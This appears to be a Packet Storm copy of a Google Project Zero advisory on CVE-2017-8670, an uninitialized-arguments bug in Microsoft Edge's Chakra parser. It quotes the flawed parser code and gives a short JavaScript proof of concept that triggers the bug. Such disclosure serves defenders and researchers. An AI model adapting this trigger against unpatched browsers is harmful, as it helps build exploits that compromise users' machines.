Microsoft Edge Chakra Parser::ParseFncFormals Uninitialized Arguments

2017-08-17T00:00:00
ID PACKETSTORM:143799
Type packetstorm
Reporter Google Security Research
Modified 2017-08-17T00:00:00

Description

                                        
                                            `Microsoft Edge: Chakra: Uninitialized arguments 2  
  
CVE-2017-8670  
  
  
Similar to the <a href="/p/project-zero/issues/detail?id=1297" title="Microsoft Edge: Chakra: Uninitialized arguments" class="closed_ref" rel="nofollow"> issue #1297 </a>. But this time, it happends in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.  
  
template<bool buildAST>  
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)  
{  
...  
if (IsES6DestructuringEnabled() && IsPossiblePatternStart())  
{  
...  
// Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.  
for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)  
{  
Assert(lexNode->IsVarLetOrConst());  
UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);  
lexNode->sxVar.sym->SetSymbolType(STFormal);  
if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)  
{  
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; <<------ HERE  
}  
}  
...  
...  
}  
  
PoC:  
function f() {  
({a = ([arguments]) => {  
}} = 1);  
  
arguments.x;  
}  
  
f();  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`